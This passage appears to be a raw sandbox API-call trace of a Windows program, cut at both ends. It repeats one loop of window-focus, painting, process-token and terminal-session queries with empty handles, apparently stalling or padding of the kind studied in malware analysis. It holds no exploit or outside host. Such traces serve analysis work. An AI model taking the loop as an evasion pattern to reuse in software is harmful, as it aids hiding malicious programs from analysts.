y=4324, lpString="", c=0) returned 1 [0221.328] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.328] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.328] GetTickCount () returned 0xe435 [0221.329] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.329] SetForegroundWindow (hWnd=0x0) returned 0 [0221.329] BringWindowToTop (hWnd=0x0) returned 0 [0221.329] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x508) returned 1 [0221.329] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.329] GetLastError () returned 0x7a [0221.329] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.329] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.330] WTSFreeMemory (pMemory=0x0) [0221.330] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.330] TextOutW (hdc=0x0, x=1834, y=4349, lpString="", c=0) returned 1 [0221.330] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.330] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.330] GetTickCount () returned 0xe435 [0221.331] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.331] SetForegroundWindow (hWnd=0x0) returned 0 [0221.331] BringWindowToTop (hWnd=0x0) returned 0 [0221.331] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x50c) returned 1 [0221.331] GetTokenInformation (in: TokenHandle=0x50c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.331] GetLastError () returned 0x7a [0221.331] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.331] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.332] WTSFreeMemory (pMemory=0x0) [0221.332] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.332] TextOutW (hdc=0x0, x=1844, y=4374, lpString="", c=0) returned 1 [0221.332] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.332] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.332] GetTickCount () returned 0xe435 [0221.333] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.336] SetForegroundWindow (hWnd=0x0) returned 0 [0221.336] BringWindowToTop (hWnd=0x0) returned 0 [0221.336] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x510) returned 1 [0221.337] GetTokenInformation (in: TokenHandle=0x510, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.337] GetLastError () returned 0x7a [0221.337] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.337] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.337] WTSFreeMemory (pMemory=0x0) [0221.337] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.337] TextOutW (hdc=0x0, x=1854, y=4399, lpString="", c=0) returned 1 [0221.337] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.337] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.337] GetTickCount () returned 0xe445 [0221.338] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.338] SetForegroundWindow (hWnd=0x0) returned 0 [0221.338] BringWindowToTop (hWnd=0x0) returned 0 [0221.338] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x514) returned 1 [0221.338] GetTokenInformation (in: TokenHandle=0x514, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.338] GetLastError () returned 0x7a [0221.338] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.338] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.338] WTSFreeMemory (pMemory=0x0) [0221.338] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.339] TextOutW (hdc=0x0, x=1864, y=4424, lpString="", c=0) returned 1 [0221.339] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.339] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.339] GetTickCount () returned 0xe445 [0221.340] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.340] SetForegroundWindow (hWnd=0x0) returned 0 [0221.340] BringWindowToTop (hWnd=0x0) returned 0 [0221.340] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x518) returned 1 [0221.340] GetTokenInformation (in: TokenHandle=0x518, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.340] GetLastError () returned 0x7a [0221.340] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.340] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.340] WTSFreeMemory (pMemory=0x0) [0221.341] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.341] TextOutW (hdc=0x0, x=1874, y=4449, lpString="", c=0) returned 1 [0221.341] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.341] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.341] GetTickCount () returned 0xe445 [0221.342] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.342] SetForegroundWindow (hWnd=0x0) returned 0 [0221.342] BringWindowToTop (hWnd=0x0) returned 0 [0221.342] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x51c) returned 1 [0221.342] GetTokenInformation (in: TokenHandle=0x51c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.342] GetLastError () returned 0x7a [0221.342] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.342] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.343] WTSFreeMemory (pMemory=0x0) [0221.343] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.343] TextOutW (hdc=0x0, x=1884, y=4474, lpString="", c=0) returned 1 [0221.343] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.343] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.343] GetTickCount () returned 0xe445 [0221.345] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.345] SetForegroundWindow (hWnd=0x0) returned 0 [0221.345] BringWindowToTop (hWnd=0x0) returned 0 [0221.345] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x520) returned 1 [0221.345] GetTokenInformation (in: TokenHandle=0x520, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.345] GetLastError () returned 0x7a [0221.345] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.345] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.346] WTSFreeMemory (pMemory=0x0) [0221.346] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.346] TextOutW (hdc=0x0, x=1894, y=4499, lpString="", c=0) returned 1 [0221.346] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.346] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.346] GetTickCount () returned 0xe445 [0221.348] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.348] SetForegroundWindow (hWnd=0x0) returned 0 [0221.348] BringWindowToTop (hWnd=0x0) returned 0 [0221.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x524) returned 1 [0221.348] GetTokenInformation (in: TokenHandle=0x524, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.348] GetLastError () returned 0x7a [0221.348] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.348] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.348] WTSFreeMemory (pMemory=0x0) [0221.349] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.349] TextOutW (hdc=0x0, x=1904, y=4524, lpString="", c=0) returned 1 [0221.349] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.349] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.349] GetTickCount () returned 0xe455 [0221.350] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.350] SetForegroundWindow (hWnd=0x0) returned 0 [0221.350] BringWindowToTop (hWnd=0x0) returned 0 [0221.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x528) returned 1 [0221.350] GetTokenInformation (in: TokenHandle=0x528, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.350] GetLastError () returned 0x7a [0221.350] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.350] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.350] WTSFreeMemory (pMemory=0x0) [0221.350] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.351] TextOutW (hdc=0x0, x=1914, y=4549, lpString="", c=0) returned 1 [0221.351] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.351] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.351] GetTickCount () returned 0xe455 [0221.351] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.351] SetForegroundWindow (hWnd=0x0) returned 0 [0221.351] BringWindowToTop (hWnd=0x0) returned 0 [0221.352] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x52c) returned 1 [0221.352] GetTokenInformation (in: TokenHandle=0x52c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.352] GetLastError () returned 0x7a [0221.352] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.352] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.352] WTSFreeMemory (pMemory=0x0) [0221.352] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.352] TextOutW (hdc=0x0, x=1924, y=4574, lpString="", c=0) returned 1 [0221.352] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.352] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.352] GetTickCount () returned 0xe455 [0221.353] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.353] SetForegroundWindow (hWnd=0x0) returned 0 [0221.353] BringWindowToTop (hWnd=0x0) returned 0 [0221.353] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x530) returned 1 [0221.353] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.353] GetLastError () returned 0x7a [0221.353] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.353] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.354] WTSFreeMemory (pMemory=0x0) [0221.354] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.354] TextOutW (hdc=0x0, x=1934, y=4599, lpString="", c=0) returned 1 [0221.354] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.354] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.354] GetTickCount () returned 0xe455 [0221.355] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.355] SetForegroundWindow (hWnd=0x0) returned 0 [0221.355] BringWindowToTop (hWnd=0x0) returned 0 [0221.355] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x534) returned 1 [0221.355] GetTokenInformation (in: TokenHandle=0x534, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.355] GetLastError () returned 0x7a [0221.355] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.355] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.355] WTSFreeMemory (pMemory=0x0) [0221.355] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.356] TextOutW (hdc=0x0, x=1944, y=4624, lpString="", c=0) returned 1 [0221.356] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.356] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.356] GetTickCount () returned 0xe455 [0221.357] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.357] SetForegroundWindow (hWnd=0x0) returned 0 [0221.357] BringWindowToTop (hWnd=0x0) returned 0 [0221.357] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x538) returned 1 [0221.357] GetTokenInformation (in: TokenHandle=0x538, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.357] GetLastError () returned 0x7a [0221.357] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.357] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.358] WTSFreeMemory (pMemory=0x0) [0221.358] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.358] TextOutW (hdc=0x0, x=1954, y=4649, lpString="", c=0) returned 1 [0221.358] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.358] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.358] GetTickCount () returned 0xe455 [0221.361] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.361] SetForegroundWindow (hWnd=0x0) returned 0 [0221.361] BringWindowToTop (hWnd=0x0) returned 0 [0221.361] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x53c) returned 1 [0221.361] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.361] GetLastError () returned 0x7a [0221.361] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.361] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.364] WTSFreeMemory (pMemory=0x0) [0221.364] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.364] TextOutW (hdc=0x0, x=1964, y=4674, lpString="", c=0) returned 1 [0221.364] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.364] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.364] GetTickCount () returned 0xe455 [0221.368] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.368] SetForegroundWindow (hWnd=0x0) returned 0 [0221.368] BringWindowToTop (hWnd=0x0) returned 0 [0221.368] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x540) returned 1 [0221.368] GetTokenInformation (in: TokenHandle=0x540, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.368] GetLastError () returned 0x7a [0221.368] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.369] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.369] WTSFreeMemory (pMemory=0x0) [0221.369] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.369] TextOutW (hdc=0x0, x=1974, y=4699, lpString="", c=0) returned 1 [0221.369] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.369] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.369] GetTickCount () returned 0xe464 [0221.370] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.370] SetForegroundWindow (hWnd=0x0) returned 0 [0221.370] BringWindowToTop (hWnd=0x0) returned 0 [0221.370] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x544) returned 1 [0221.370] GetTokenInformation (in: TokenHandle=0x544, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.370] GetLastError () returned 0x7a [0221.370] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.370] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.371] WTSFreeMemory (pMemory=0x0) [0221.371] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.371] TextOutW (hdc=0x0, x=1984, y=4724, lpString="", c=0) returned 1 [0221.371] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.371] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.371] GetTickCount () returned 0xe464 [0221.371] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.371] SetForegroundWindow (hWnd=0x0) returned 0 [0221.371] BringWindowToTop (hWnd=0x0) returned 0 [0221.371] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x548) returned 1 [0221.372] GetTokenInformation (in: TokenHandle=0x548, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.372] GetLastError () returned 0x7a [0221.372] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.372] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.372] WTSFreeMemory (pMemory=0x0) [0221.372] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.372] TextOutW (hdc=0x0, x=1994, y=4749, lpString="", c=0) returned 1 [0221.372] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.372] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.372] GetTickCount () returned 0xe464 [0221.374] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.374] SetForegroundWindow (hWnd=0x0) returned 0 [0221.374] BringWindowToTop (hWnd=0x0) returned 0 [0221.374] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x54c) returned 1 [0221.374] GetTokenInformation (in: TokenHandle=0x54c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.374] GetLastError () returned 0x7a [0221.374] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.374] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.375] WTSFreeMemory (pMemory=0x0) [0221.375] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.375] TextOutW (hdc=0x0, x=2004, y=4774, lpString="", c=0) returned 1 [0221.375] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.375] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.375] GetTickCount () returned 0xe464 [0221.377] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.377] SetForegroundWindow (hWnd=0x0) returned 0 [0221.377] BringWindowToTop (hWnd=0x0) returned 0 [0221.377] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x550) returned 1 [0221.377] GetTokenInformation (in: TokenHandle=0x550, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.377] GetLastError () returned 0x7a [0221.377] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.377] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.378] WTSFreeMemory (pMemory=0x0) [0221.378] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.378] TextOutW (hdc=0x0, x=2014, y=4799, lpString="", c=0) returned 1 [0221.378] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.378] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.378] GetTickCount () returned 0xe464 [0221.384] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.384] SetForegroundWindow (hWnd=0x0) returned 0 [0221.384] BringWindowToTop (hWnd=0x0) returned 0 [0221.384] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x554) returned 1 [0221.384] GetTokenInformation (in: TokenHandle=0x554, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.384] GetLastError () returned 0x7a [0221.384] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.384] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.385] WTSFreeMemory (pMemory=0x0) [0221.385] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.385] TextOutW (hdc=0x0, x=2024, y=4824, lpString="", c=0) returned 1 [0221.385] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.385] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.385] GetTickCount () returned 0xe474 [0221.387] SwitchToThisWindow (hwnd=0x0, 